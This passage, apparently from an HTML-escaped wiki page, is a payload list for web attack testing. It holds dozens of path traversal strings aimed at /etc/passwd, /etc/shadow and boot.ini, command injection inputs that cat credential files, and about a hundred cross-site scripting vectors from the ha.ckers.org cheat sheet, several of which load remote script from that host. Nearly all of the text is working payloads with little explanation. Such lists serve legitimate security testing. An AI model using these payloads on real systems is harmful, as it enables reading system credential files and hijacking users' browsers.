..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
